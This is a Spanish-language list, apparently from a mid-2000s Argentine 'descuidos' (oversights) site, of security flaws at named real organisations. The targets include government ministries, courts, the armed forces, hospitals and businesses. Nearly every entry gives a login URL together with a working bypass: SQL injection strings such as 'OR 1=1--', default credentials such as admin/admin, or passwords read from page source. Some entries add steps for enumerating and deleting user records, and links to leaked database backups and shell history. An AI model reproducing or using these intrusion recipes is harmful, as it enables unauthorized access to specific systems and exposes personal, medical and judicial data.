| Descuido | Bug/Exploit |
| #Parmalat |
http://www.parmalat.com.ar/names.nsf
http://www.parmalat.com.ar/log.nsf
http://www.parmalat.com.ar/catalog.nsf
http://www.parmalat.com.ar/admin4.nsf
|
| #La Pampa |
http://mail.lapampa.gov.ar/admin4.nsf
http://mail.lapampa.gov.ar/names.nsf
|
| #Liberty |
http://www.libertyargentina.com.ar/names.nsf
http://www.libertyseguros.com.ar/names.nsf
|
|
#San Martín de los Andes
|
http://digesto.smandes.gov.ar/admin4.nsf
http://digesto.smandes.gov.ar/log.nsf
http://digesto.smandes.gov.ar/catalog.nsf
http://digesto.smandes.gov.ar/names.nsf
|
| #Ministerio de Cultura y Eduación |
http://www.profor.mcye.gov.ar/admin4.nsf
http://www.profor.mcye.gov.ar/catalog.nsf
http://www.profor.mcye.gov.ar/names.nsf
http://www.ls.mcye.gov.ar/admin4.nsf
http://www.ls.mcye.gov.ar/log.nsf
http://www.ls.mcye.gov.ar/catalog.nsf
http://www.ls.mcye.gov.ar/names.nsf
http://www.ucn.mcye.gov.ar/names.nsf
http://www.ucn.mcye.gov.ar/admin4.nsf
IP router: 170.155.20.5 | Posee Usuario y Clave débiles.
|
| #Osteored |
http://www.osteored.com.ar/stcenter.nsf |
| #ISEV |
http://www.isev.com.ar/
Para acceder al Sector Premium:
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Agencia Foia |
http://www.agenciafoia.com.ar/login2.asp
Para acceder a la Intranet:
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Fuerzas Armadas |
http://www.faa.mil.ar/?PageServices
http://www.faa.mil.ar/?pageservices
|
| #Conexia |
http://www.conexia.com.ar/
Usuario: admin | Clave: admin
|
| #Azira |
http://www.adepa.com.ar/metaPortal/LogIn/
Acceso a Extranet:
Usuario: admin | Clave: admin
|
| #Impsat |
Clave default para la mayoría de los routers de sus rangos. La estructura de la clave es X-Y.
Por razones evidentes no se dará a conocer la clave. Busquen en sus rangos routers vulnerables con clave X-Y
|
| #Hospital Italiano |
Ingresar a la Sección Paciente Virtual sin poseer usuario y clave.
http://www.hospitalitaliano.org.ar/intranet/formularios/paciente_virtual/index.php
|
|
#Responsables Informáticos de la Administración Pública Nacional
|
http://rrii.sgp.gov.ar
Según se puede ver , sólo los usuarios autorizados pueden tener acceso a los documentos. Y no tenemos forma de registrarnos.
Acceder a sus documentos.
http://rrii.sgp.gov.ar/intranet/Documents/
También podemos acceder con el usuario : con privilegio de "anónimo" . Es decir, sólo tendremos acceso a ciertos documentos.
Hoy 11/11/04 el problema anterior fue solventado pero :
http://rrii.sgp.gov.ar/intranet73/
Usuario: admin | Clave: admin
Copia de Seguridad BD: http://descuidos.elportal.info/intranet73-20041210.231234.sql.gz
|
| #Organización Panalimentos |
http://www.panalimentos.org/intranet/
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
Una vez dentro , nos loguearemos de la mismo forma en la sección "Gerencia Remota", teniendo acceso a los diferentes usuarios.
Ya con los nombres de usuario podremos volver a la página de logueo de la intranet. Y usar :
Usuario: nombreUsuario'-- | Clave: 'OR 1=1--
Y nos loguearemos con el usuario elegido.
Entrar en menú administración:
http://www.panalimentos.org/search/esp/scripts/LoginAdmin.asp
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #El Sitio |
Log del Bash History.
http://descuidos.elportal.info/bash_history.log
|
| #Conae |
http://conae-gate6.conae.gov.ar
Es curioso porque tanto Netcraft como Google , nos permiten conocer la dirección http del router. Por lógica no debería ser así.
Luego resta aplicar un bug de los routers cisco. La explicación del bug y cómo explotarlo lo encontrarán en:
http://www.securityfocus.com/infocus/1734
|
|
#Universidad La Rioja
|
http://www.unlar.net/wwwroot/sigea/ |
| #Ministerio de Economía |
http://descuidos.elportal.info/mecon.zip
Los diferentes archivos contenidos en el zip fueron encontrandos utilizando el propio buscador de la página.
|
| #Poder Judicial de la Ciudad Autónoma de Buenos Aires |
http://iis.jusbaires.gov.ar/
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Poder Judicial de la Provincia de Buenos Aires |
Lista de Subdominios afectados: http://www.scba.gov.ar/Mesa/mesa.htm
Luego , una vez ya en el subdominio :
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
Ejemplo:
Elijo el subdominio de Olavarría: http://www.ol.pjba.gov.ar/mev/
Me logueo con el Usuario y Clave anterior.
Ingreso a Modificar mis Datos.
Ver el URL: http://www.ol.pjba.gov.ar/mev/registracion.asp?IdUsuario=1&pagina=%2Fmev%2Fseleccion%2Easp
Luego vamos cambiando el IdUsuario y tendremos acceso a los Datos de los Usuarios registrados en el Sistema.
También podremos borrar a los usuarios, pero no sería muy ético de nuestra parte.
|
| #Superintendencia de Seguros de la Nación |
https://iris.ssn.gov.ar/
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Registro Nacional de Armas |
Según lo indicado en la página :
"Cuando se envía datos a través de Internet existe la posibilidad que otros puedan verlos. Para evitar dicha situación, el ReNAr ha creado un canal seguro de comunicación entre Ud. y nosotros encriptando dichos datos por medio de certificados digitales."
Pero :
http://www.renar.gov.ar/_private/form_results.txt
|
| #Ministerio de Salud |
http://www.ms.gba.gov.ar/HERG/login.html
Usuario: Prueba | Clave: Prueba
|
| #Comisión Investigaciones Científicas |
http://www.cic.gba.gov.ar/sistemas/
Usuario: admin | Clave: admin
http://www.cic.gba.gov.ar/sistemas/invest/
|
| #Gobierno Provincia Buenos Aires |
https://sistemas.gba.gov.ar/login.php
Usuario: consulta | Clave: consulta
|
| #Sistema de Diagnóstico del Capital Humano |
http://www.sidcap.fundemp.org.ar/index.html
Usuario: sidcap'-- | Clave: 'OR 1=1--
|
| #Registro de Importaciones para Insumos destinados a Investigaciones Científico-Tecnológicas |
http://www.roecyt.secyt.gov.ar/php/login.php
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
El sitio nos dice: "Recuerde imprimir esta página y agregarla a la documentación complementaria que deberá remitir a ROECyT"
Con lo cual podemos ver la importancia de dicho descuido.
|
| #Dirección General de Bienestar - Ejército Argentino |
Links a las promociones: http://www.bienejer.mil.ar/promos/listaprom.asp
En c/u de ellas van a pedir que ingresemos el Apellido - DNI - Contraseña.
Ejemplo:
http://www.bienejer.mil.ar/promos/passw.asp?prom=095
Apellido: ' OR ' ' = ' | DNI: 0 | Clave: ' OR ' ' = '
Y estaríamos logueados.
A la derecha podemos ver un formulario de ingreso a la sección "Privado DGB"
Lo que permite esta sección es administrar la página y según dice su utilización "está restringida al administrador de las promociones".
En dicha sección nos loguearemos con el Usuario y Clave anterior: ' OR ' ' = '
Se nos activará un link de "Administración" cone el cual podremos editar el sector de mensajes y novedades.
|
| #Estudio Mazars |
http://estudio.mazars.com.ar/auditoria/
Acceso al Sistema de Control:
Usuario: ' OR ' ' = ' | Clave: ' OR ' ' = '
|
| #Comisión Nacional de Regularización de Transporte |
http://www.cnrt.gov.ar/pm/indexpm.html
Según lo indicado en la página:
"La Extranet de la CNRT no es de dominio público. Solo pueden acceder a ella el personal autorizado y los organismos vinculados a su operatoria"
Pero:
Usuario: ' OR ' ' = ' | Clave: ' OR ' ' = '
|
| #Provincia Salud / Hospital Francés |
https://intranet.psalud.com.ar
Según se indica en la página:
"Prohibido el acceso a personal ajeno a Provincia Salud / Hospital Francés. Su usuario y password es intransferible, por favor no los revele a otras personas."
Pero:
Usuario: admin | Clave: admin
|
| #CajaDePagos |
http://www.cajadepagos.com
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
Para obtener usuarios válidos : http://www.cajadepagos.com/nuestrosclientes.asp
Y luego nos podremos loguear con cualquier de ellos de la siguiente forma:
Usuario: nombreUsuario'-- | Clave: 'OR 1=1--
Ejemplo: Usuario: icatel'-- | Clave: 'OR 1=1--
|
| #Nosis |
http://www.nosis.com.ar
Intranet de Atención al Cliente : http://atclientes.nosis.com.ar
Usuario: ' OR ''=' | Clave: ' OR ''='
Administrador OCI : http://adminoci.nosis.com.ar/
|
| #SES NET |
http://www.sesnet.com.ar
Ingreso a la Gestion WEB:
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Marticorba |
Colegio y Caja de martilleros y corredores Públicos de la prov de Bs As: http://www.marticorba.org.ar
Acceso del afiliado: http://www.marticorba.org.ar/login.asp
Número de afiliado: número (Puede ir desde el 1 hasta el 28829) | Clave: ' OR ''='
Colegio con acceso a las consultas personalizadas: http://www.marticorba.org.ar/logincolegio.asp
Colegio: identificación (lo sacamos de la ficha del afiliado) | Clave: ' OR ''='
|
| #Colegio de Escribanos de la Ciudad de Bs As |
http://www.colegio-escribanos.org.ar/
Acceso a la sección "Area restringida" : http://www.colegio-escribanos.org.ar/restringida.asp
Usuario: 'or 1=1-- | Clave: 'or 1=1--
|
| #FEMAPE |
Federacion de empresas mayoristas y proveedores del estado de la prov de Bs As: www.femape.org.ar
Acceso a Licitaciones: http://www.femape.org.ar/v3/licitaciones/licitaciones.asp
Acceso a proveedores integrantes: http://www.femape.org.ar/v3/assii/asii_integrantes.asp
Acceso a Clínicas / Hospitales / Entidades: http://www.femape.org.ar/v3/assii/asii_clinicas.asp
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Aria Giovanni Nude |
Gracias al amigo n3tar podrán deleitarse siendo miembros de :
www.ariagiovanninude.com/join-aria-giovanni-nude.html
User: 'OR 1=1-- | Clave: 'OR 1=1--
Que lo disfruten :)
|
| #Ministerio de Seguridad |
http://www.mseg.gba.gov.ar/Linea911/modulosformacionbasica.htm
Si observamos el código fuente:
if (form.password.value != "sistema911")
alert (" Clave incorrecta ");
Por lo q está mas q claro q la clave es sistema911.
También podremos escalar directorios:
http://www.mseg.gba.gov.ar/Linea911/
Si bien este descuido no se destaca por la relevancia del contenido, es un claro ejemplo de la realidad de algunas páginas gubernamentales.
|
| #Procuración general Suprema Corte Justicia de la provincia de Buenos Aires |
http://www.procuraciongral.com.ar/acceso.html
"El ingreso a esta sección es exclusiva para Instructores del Departamento de Policía Judicial"
Nuevamente volvamos a mirar el código fuente :)
if (form.id.value=="instructores")
if (form.pass.value=="secpoljud")
A esta altura, ya nada sorprende.
|
| #IFX Networks |
IFX Networks es un ISP de gran jerarquía.
Sin embargo presenta ciertos defectos en lo relativo a la seguridad.
Por empezar la lista de sus routers/switches con su nombre, IP y fabricante.
http://nms1.ifxnetworks.com/
Y por último:
http://nms2.ifxnetworks.com
Usuario: admin | Clave: admin
Tendremos acceso a JFFNMS a nivel de administrador. Info en http://www.jffnms.org/
|
| #Amchamar |
http://www.amchamar.com.ar/seguridad/ingreso.asp
http://www.amchamar.com.ar/seguridad/passwordfile.txt
|
| #Limansky |
Acceso a la Intranet: http://64.76.47.162/logon.asp
Observamos el código fuente:
function Entrar(h6537df) {window.location=h6537df+".htm"}
Clave: h6537df
|
| #Asyste Argentina |
http://200.68.117.73/inicio.asp
Usuario: admin | Clave: admin
|
| #Mymtec |
http://sistemas.mymtec.com.ar/
Clave: 'or 1=1--
|
| #Obra social para la actividad docente |
http://200.69.253.49
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #OSNET |
http://www.osnet.com.ar/osnet/IngresoEmp.asp
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Legislatura Ciudad de Buenos Aires |
Direccion general de sistemas : http://reclamos.legislatura.gov.ar
Acceso a Inventario: http://reclamos.legislatura.gov.ar/~espark/new_inventario/inicio.php
Archivos interesantes: http://reclamos.legislatura.gov.ar/~espark/
|
| #BGH |
http://200.49.210.124
Manuales para celulares Motorola y soft:
Usuario: ' OR ''=' | Clave: ' OR ''='
Luego en el menu superior observamos la direccion de mail q figura en "Contactenos" y nos logueamos con dicho usuario. De esa forma tendremos acceso a la administracion:
Usuario: arrieta | Clave: ' OR ''='
|
| #Julio Aurelio SA |
http://24.232.97.129/
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Comision Federal de Impuestos |
Sector de acceso reservado para Representantes y Usuarios Registrados: www.cfi.gov.ar/menup.html
Usuario: prueba | Clave: prueba
|
| #Elexias |
http://www.elexias.com.ar/profesionales/archivos/login2.asp
Usuario: admin | Clave: 'OR 1=1--
Como veremos la clave aparece con ****
Nos bajamos un plugin para el Firefox : http://www.contrex-us.com/gecko/unhidepw.xpi
Que permite visualizar el texto en lugar de los *****
Volvemos a loguearnos con Usuario: admin | Clave: 'OR 1=1 --
Ahora la clave la veremos en texto plano, por lo q resta loguearse con la clave correspondiente.
Y asi visualizar los usuarios y sus respectivas claves para acceder a los diferentes servicios.
|
| #EGobierno |
http://www.egobierno.gov.ar/municipios/index.asp
Usuario: admin | Clave: admin
|
| #Red Apícola Latinoamericana |
http://www.apinetla.com.ar/login.php
Usuario: admin | Clave: admin
|
| #Harteneck - Quian & Asociados |
http://www.harteneck-quian.com/intranet.html
El sistema de login para los diferentes servicios está realizado en Flash.
Por ende obtendremos las claves mirando el código fuente de los swf.
Solamente completar el campo de password para ingresar.
|
| #Colegio de Bioquímicos de Entre Ríos |
http://www.cober.com.ar/administrador/control.htm
Acceso al panel de control sin protección de clave.
|
| #Epi-ETA |
http://www.epi-eta.org/intranet/Default.asp
Usuario:'OR 1=1-- | Clave:'OR 1=1--
|
| #Bigua Rugby Club |
http://www.ucip.org.ar/bi/admin.asp
Usuario: ' OR ' ' = ' | Clave: ' OR ' ' = '
La página anteriormente estuvo "hackeada"
|
| #SINAVIMO |
http://www.sinavimo.gov.ar/cgi-bin/yabb/YaBB.pl?board=;action=login
Acceso al foro como administrador: Usuario: admin | Clave admin
|
| #Fundacion de Investigaciones Economicas Latinoamericanas |
http://24.232.76.6/datafiel/Login.asp
Usuario: 'or 1=1-- | Clave: 'or 1=1--
|
| #Sociedad de Estiba y Desestiba del puerto de la Bahia de Cadiz |
Acceso a empresas: http://www.estigades.es/comun/empresas/login.asp?lengua=2
Usuario: 'or 1=1-- | Clave: 'or 1=1--
|
| #Aycon Consultores SA |
http://www.aycon.cl/sipar/login.asp
Usuario: 'or 1=1-- | Clave: 'or 1=1--
|
| #Asesores de Córdoba SA |
http://www.asecor.com.ar/asp/login.asp
Usuario: 'or 1=1-- | Sucursal: 0 | Clave: 'or 1=1--
|
| #SERNAL SA |
http://www.sernal.es/ConsultaProductos/Login.asp
Usuario: 'or 1=1-- | Clave: 'or 1=1--
|
| #Ministerio del Interior |
https://intranet.mininterior.gov.ar/default.asp
Tramix (consulta de viejos expedientes) - Usuario: tramix | Clave: tramix
Compromisos y viajes - Usuario: administrador | Clave: admin
Digitalización de Actos Administrativos: Despacho - Usuario: administrador | Clave: despacho
Digitalización de Actos Administrativos: Biblioteca - Usuario: administrador | Clave: admin
Subsidios - Usuario: administrador | Clave: 123
|
| #CTI |
http://ctidirecto.cti.com.ar/gws/
Los archivos .log contienen los números de celulares con sus respectivas contraseñas para loguearse en : http://ctidirecto.cti.com.ar/gws/PTTProvServlet?Action=Generate&Xsl=index.xsl
Una vez dentro podremos modificar la lista de contactos del usuario y demás.
|
| #Equalizer Systems |
http://equalizersystems.com/tech/Admin-Login.asp
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Los Andes |
http://www.losandes.com.ar/AdManager/admin/login.asp
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Zetnia |
http://cms.zetnia.com.ar/admin/login/index.cfm
Usuario: admin | Clave: admin
|
| #Amaira |
http://200.49.155.182
Usuario: ' OR ''=' | Clave: ' OR ''='
Potente motor de búsqueda (inmobiliarias)
|
| #Clarín |
http://www.informatica.clarin.com/diario/grilla/base
Linda base de datos....
|
| #Hotel Los Leones |
http://www.losleones.info/admin.asp
Usuario: admin | Clave: admin
|
| #European Pellet Centre |
http://www.pelletcentre.info/database/admin.asp
Usuario: ' OR ''=' | Clave: ' OR ''='
|
| #Consejo Profesional de Agrimensura |
http://www.cpa.org.ar/validaruser.php
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Estudio Morea & Asociados |
http://www.emorea.com.ar/restringido.asp
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Secretaría General de la Gobernación |
http://www.dc.dpiyc.sg.gba.gov.ar/
Usuario: admin | Clave: webport
|
| #Sistemas Provinciales |
http://dpdserver.dpi.sg.gba.gov.ar/login.php
Usuario: consulta | Clave: consulta
Esto ya se había informado pero para otro servidor: https://sistemas.gba.gov.ar/login.php
Ese servidor fue subsanado, pero al parecer éste no... son los mismos sistemas.
Lo interesante: consulta de sueldos, entre otros.
|
| #Gobierno Tucumán |
http://www.tucuman.gov.ar/gobierno/compras/login.asp
CUIL: 0 | Clave: 'OR 1=1--
|
| #Gobierno La Rioja |
http://dgip.larioja.gov.ar/contribuyentes/login.asp
Usuario: 'OR 1=1-- | Clave: 'OR 1=1--
|
| #Centro Unificado |
https://www.centrounificadoinfo.com.ar/index.aspx
Cámara de distribuidores autorizados de formularios emitidos por el Estado.
Usuario: test | Clave: test
|
